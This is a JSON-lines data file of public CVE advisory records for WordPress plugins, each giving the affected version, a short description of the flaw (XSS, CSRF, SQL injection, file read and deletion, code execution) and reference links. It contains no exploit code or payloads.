{"CVE_ID":"CVE-2024-9614","slug":"constant-contact-forms-by-mailmunch","versionImpact":"2.1.2","description":"The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92abab9e-904a-4a62-a911-a57baa9aa4af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92abab9e-904a-4a62-a911-a57baa9aa4af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/constant-contact-forms-by-mailmunch\\\/trunk\\\/admin\\\/partials\\\/constantcontact-mailmunch-integrate.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10175","slug":"pricing-tables-for-visual-composer","versionImpact":"1.4","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdo_pricing_tables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricing-tables-for-visual-composer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pricing-tables-for-visual-composer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79091bc0-d9b6-4a4b-926d-0447193d27c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2477","slug":"cryokey","versionImpact":"2.4","description":"The CryoKey plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018ckemail\u2019 parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryokey\\\/trunk\\\/cryokey.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cryokey\\\/trunk\\\/cryokey.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cryokey\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cryokey\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1646f96c-f0f4-433a-ac5e-04c1c251972d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1646f96c-f0f4-433a-ac5e-04c1c251972d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4603","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_file() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This is only exploitable by unauthenticated attackers in default configurations where the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4603\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4603\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4603\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4603\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/242ad00b-3602-4988-ab7a-76fba2e9d4cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/242ad00b-3602-4988-ab7a-76fba2e9d4cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5936","slug":"vr-calendar-sync","versionImpact":"2.4.7","description":"The VR Calendar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.7. This is due to missing or incorrect nonce validation on the syncCalendar() function. This makes it possible for unauthenticated attackers to trigger a calendar sync via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vr-calendar-sync\\\/trunk\\\/Admin\\\/Classes\\\/VRCalendarAdmin.class.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vr-calendar-sync\\\/trunk\\\/Admin\\\/Classes\\\/VRCalendarAdmin.class.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dbafe8-dcb3-4ac9-ad5e-76baf1963850?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57dbafe8-dcb3-4ac9-ad5e-76baf1963850?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0718","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c26d6de-5653-4be8-9526-39b30cb61625\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c26d6de-5653-4be8-9526-39b30cb61625\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0693","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_transaction_id' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about the transaction ids of arbitrary form submissions that included payment.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f33a8db-7cd0-4a53-b2c1-cd5b7cd16214?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f33a8db-7cd0-4a53-b2c1-cd5b7cd16214?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2636","slug":"an-gradebook","versionImpact":"5.0.1","description":"The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3bfd88-1251-4d40-b26f-62950a3ce0b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3bfd88-1251-4d40-b26f-62950a3ce0b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5567","slug":"qr-code-tag","versionImpact":"1.0","description":"The QR Code Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'qrcodetag' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be004002-a3ac-46e9-b0c1-258f05f97b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be004002-a3ac-46e9-b0c1-258f05f97b2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qr-code-tag\\\/trunk\\\/lib\\\/qrct\\\/QrctWp.php?rev=1705525#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qr-code-tag\\\/trunk\\\/lib\\\/qrct\\\/QrctWp.php?rev=1705525#L369\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4475","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not have a CSRF check when clearing logs, which could allow attackers to make a logged in admin clear them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0c7fa00-da6e-4f07-875f-7b85759a54b3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0c7fa00-da6e-4f07-875f-7b85759a54b3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10189","slug":"anchor-episodes-index","versionImpact":"2.1.10","description":"The Anchor Episodes Index (Spotify for Podcasters) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's anchor_episodes shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anchor-episodes-index\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anchor-episodes-index\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171752\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171752\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9578","slug":"hide-links","versionImpact":"1.4.2","description":"The Hide Links plugin for WordPress is vulnerable to unauthorized shortcode execution due to do_shortcode being hooked through the comment_text filter in all versions up to and including 1.4.2. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes available on the target site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4198bbb2-3aff-492e-a781-b0c9477baf6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4198bbb2-3aff-492e-a781-b0c9477baf6c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-links\\\/trunk\\\/class.hidelinks.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-links\\\/trunk\\\/class.hidelinks.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11184","slug":"wp-enable-svg","versionImpact":"0.7","description":"The wp-enable-svg WordPress plugin through 0.7 does not sanitize SVG files when uploaded, allowing for authors and above to upload SVGs containing malicious scripts","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc982bcb-9974-481f-aef4-580ae9edc3c8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc982bcb-9974-481f-aef4-580ae9edc3c8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12593","slug":"pdf-for-wpforms","versionImpact":"4.6.0","description":"The PDF for WPForms + Drag and Drop Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's yeepdf_dotab shortcode in all versions up to, and including, 4.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222206\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222206\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pdf-for-wpforms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pdf-for-wpforms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6b24a2-55ed-40e7-bcf0-a9ceb8ea022c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6b24a2-55ed-40e7-bcf0-a9ceb8ea022c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2303","slug":"block-logic","versionImpact":"1.0.8","description":"The Block Logic \u2013 Full Gutenberg Block Display Control plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.8 via the block_logic_check_logic function. This is due to the unsafe evaluation of user-controlled input. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-logic\\\/tags\\\/1.0.8\\\/block-logic.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-logic\\\/tags\\\/1.0.8\\\/block-logic.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a76f851-3f4e-4457-a33c-eede51c4b4d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a76f851-3f4e-4457-a33c-eede51c4b4d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4602","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to Arbitrary File Reads in all versions up to, and including, 1.2.5 via the get_file() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. This is only exploitable by unauthenticated attackers in default configurations where the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4602\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4602\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4602\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4602\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20caab24-4af7-4592-9b18-f2f5acb423c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20caab24-4af7-4592-9b18-f2f5acb423c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4587","slug":"ab-testing-for-wp","versionImpact":"1.18.2","description":"The A\/B Testing for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ab-testing-for-wp\/ab-test-block' block in all versions up to, and including, 1.18.2 due to insufficient input sanitization and output escaping on the 'id' parameter. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ab-testing-for-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ab-testing-for-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dcf401a-3b91-4b55-b6b1-a132ec195607?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dcf401a-3b91-4b55-b6b1-a132ec195607?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0731","slug":"interactive-geo-maps","versionImpact":"1.5.9","description":"The Interactive Geo Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the action content parameter in versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2861473%40interactive-geo-maps%2Ftrunk&old=2857078%40interactive-geo-maps%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2861473%40interactive-geo-maps%2Ftrunk&old=2857078%40interactive-geo-maps%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ce515a-377c-49b4-8d1b-7ac22769c759\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ce515a-377c-49b4-8d1b-7ac22769c759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0692","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_payment_status' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about the payment status of arbitrary form submissions.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd85ff2-6607-4ac8-b91c-88f6f2fa6c56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd85ff2-6607-4ac8-b91c-88f6f2fa6c56?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2579","slug":"inventorypress","versionImpact":"1.7","description":"The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-inventory-press-plugin\",\"name\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-inventory-press-plugin\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1425","slug":"embedpress","versionImpact":"3.9.8","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Calendar Widget Link in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Calendar.php#L314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Calendar.php#L314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
